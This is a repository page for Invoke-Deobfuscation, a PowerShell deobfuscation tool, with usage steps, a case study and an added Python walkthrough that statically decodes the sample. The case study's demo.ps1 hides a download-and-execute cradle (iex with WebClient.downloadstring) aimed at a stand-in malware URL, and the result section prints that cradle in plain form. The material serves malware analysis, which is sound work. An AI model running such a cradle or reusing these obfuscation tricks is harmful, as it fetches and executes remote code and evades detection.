# Invoke-Deobfuscation

**Repository Path**: LZ1618/invoke-deobfuscation

## Basic Information

- **Project Name**: Invoke-Deobfuscation
- **Description**: Deobfuscation tool for PowerShell
- **Primary Language**: PowerShell
- **License**: Not specified
- **Default Branch**: main
- **Homepage**: None
- **GVP Project**: No

## Statistics

- **Stars**: 1
- **Forks**: 1
- **Created**: 2023-03-20
- **Last Updated**: 2023-03-20

## Categories & Tags

**Categories**: Uncategorized

**Tags**: None

## README

### Invoke-Deobfuscation

---

- Environment
  - Windows: PowerShell Shell
  - Linux: pwsh https://docs.microsoft.com/en-us/powershell/scripting/install/installing-powershell-on-linux?view=powershell-7.2
  - MacOS: pwsh https://docs.microsoft.com/en-us/powershell/scripting/install/installing-powershell-on-macos?view=powershell-7.2

- How to use it?

  ~~~shell
  git clone https://gitee.com/snowroll/invoke-deobfuscation
  cd invoke-deobfuscation/Code
  pwsh # Linux or MacOS
  Import-Module ./Invoke-DeObfuscation.psd1
  DeObfuscatedMain -ScriptPath0 ../Data/demo.ps1
  ~~~

- Case Study
  - demo.ps1

    ~~~powershell
    Ie`X ("{2}{0}{1}" -f 'ost h', 'ello', 'write-h')
    $xdjmd = 'aAB0AHQAcABzADoALwAvAHQAZQBzAHQALgBjAG'
    $lsffs = '8AbQAvAG0AYQBsAHcAYQByAGUALgB0AHgAdAA='
    $sdfs = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($xdjmd + $lsffs))
    .($psHoME[4]+$PShOmE[30]+'x') (Ne`W-oB`JeCt Net.Web`C`lient).downloadstring($sdfs)
    ~~~

  - Result

    ~~~powershell
    Write-Host hello
    $var0 = 'aAB0AHQAcABzADoALwAvAHQAZQBzAHQALgBjAG'
    $var1 = '8AbQAvAG0AYQBsAHcAYQByAGUALgB0AHgAdAA='
    $var2 = 'https://test.com/malware.txt'
    .('iex') (New-Object net.webclient).downloadstring('https://test.com/malware.txt')
    ~~~
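
To see why demo.ps1 reduces to the result shown in the case study, the following added example (not part of this repository, and not a description of how Invoke-Deobfuscation works internally) statically unwinds each obfuscation layer in Python without executing the script. All function names and regexes are hypothetical; it assumes the default Windows PowerShell 5.1 `$PSHOME`, that backticks appear only outside string literals, and that base64 fragments are concatenated in assignment order, as they are in demo.ps1.

```python
import base64
import re

# Constructed input: the five lines of demo.ps1 from the case study above.
DEMO = r'''Ie`X ("{2}{0}{1}" -f 'ost h', 'ello', 'write-h')
$xdjmd = 'aAB0AHQAcABzADoALwAvAHQAZQBzAHQALgBjAG'
$lsffs = '8AbQAvAG0AYQBsAHcAYQByAGUALgB0AHgAdAA='
$sdfs = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($xdjmd + $lsffs))
.($psHoME[4]+$PShOmE[30]+'x') (Ne`W-oB`JeCt Net.Web`C`lient).downloadstring($sdfs)
'''

# Assumption: default $PSHOME of Windows PowerShell 5.1 (index 4 = 'i', 30 = 'e').
PSHOME = r"C:\Windows\System32\WindowsPowerShell\v1.0"

def strip_ticks(text):
    """Drop backticks that do not start a real escape such as `n or `t."""
    return re.sub(r"`(?![0abefnrtuv])", "", text)

def resolve_format(text):
    """Evaluate "{i}{j}" -f 'a', 'b' when every argument is a string literal."""
    def fold(m):
        args = re.findall(r"'([^']*)'", m.group(2))
        body = re.sub(r"\{(\d+)\}", lambda i: args[int(i.group(1))], m.group(1))
        return "'" + body + "'"
    return re.sub(r'''"((?:\{\d+\})+)"\s*-f\s*((?:'[^']*'\s*,\s*)*'[^']*')''', fold, text)

def resolve_pshome(text):
    """Replace $PSHOME[n] (any casing) with the character it indexes."""
    return re.sub(r"\$pshome\[(\d+)\]",
                  lambda m: "'" + PSHOME[int(m.group(1))] + "'", text, flags=re.I)

def join_literals(text):
    """Fold 'a'+'b' chains of single-quoted literals into one literal."""
    prev = None
    while prev != text:
        prev, text = text, re.sub(r"'([^']*)'\s*\+\s*'([^']*)'", r"'\1\2'", text)
    return text

def decode_split_base64(text):
    """Join base64 literals assigned to variables, decode as UTF-16LE."""
    parts = re.findall(r"^\$\w+\s*=\s*'([A-Za-z0-9+/=]+)'\s*$", text, flags=re.M)
    return base64.b64decode("".join(parts)).decode("utf-16-le")

def triage(script):
    """Return (simplified script text, decoded download URL)."""
    text = join_literals(resolve_pshome(resolve_format(strip_ticks(script))))
    return text, decode_split_base64(text)

if __name__ == "__main__":
    simplified, url = triage(DEMO)
    print(simplified, url, sep="\n")
```
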